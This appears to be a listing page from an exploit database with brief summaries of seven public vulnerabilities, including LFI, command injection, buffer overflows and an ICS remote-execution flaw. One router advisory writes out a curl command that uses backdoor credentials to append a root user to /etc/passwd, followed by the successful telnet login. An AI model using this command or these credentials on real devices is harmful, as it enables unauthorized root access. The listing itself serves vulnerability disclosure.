header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Dataface portal lfi vuln

Dataface portal is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with maliciously crafted parameters to the vulnerable server. This can allow an attacker to read sensitive files from the server, such as /etc/passwd.

Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the 'url' property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the 'url' property. One of these files it will be stored in a temporary directory and executed.

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

Without prior authentication, if the 'allowDownload' option is enabled in config.php, meaning that a tarball download is allowed across all the repositories (not uncommon), an attacker can invoke the dl.php script and passing a well formed 'path' argument to execute arbitrary commands against the underlying operating system.

Xitami Web Server 2.5b4 – Remote Buffer Overflow Exploit

This exploit is for Xitami Web Server 2.5b4. It is a remote buffer overflow exploit which is tested on Windows XP Pro English with Service Pack 3. The exploit is coded by mr.pr0n and the bug was discovered by Krystian Kloskowski (h07). The exploit is executed by setting up a listener and then entering the target's IP address.

Alex Stanev Security Advisory #4 @31.05.2011

The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP. 1) Web administration interface can be accessed with standard user/password pair admin:admin This can be later changed, but there is another possible access pair - engineer:engineer and it can't be changed via the web interface. 2) Some of the SDK standard scripts are left and their screens in the web interface are just HTML commented. This reveals the /goform/SystemCommand method. Remote add r00t user with password boza $curl --basic -u "engineer:engineer" -d "command=echo -e "r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh" >> /etc/passwd;&SystemCommandSubmit=Apply" 192.168.100.254/goform/SystemCommand $telnet 192.168.100.254 Trying 192.168.100.254... Connected to 192.168.100.254. modacom login: r00t Password: boza BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash) Enter 'help' for a list of built-in commands.

Easy~Ftp Server v1.7.0.2 Post-Authentication BoF

A buffer overflow vulnerability exists in Easy~Ftp Server v1.7.0.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is triggered when a malicious user sends a specially crafted MKD command with an overly long string, which can overwrite the SEH handler and cause a buffer overflow.

7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities

This module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.

Recent Exploits: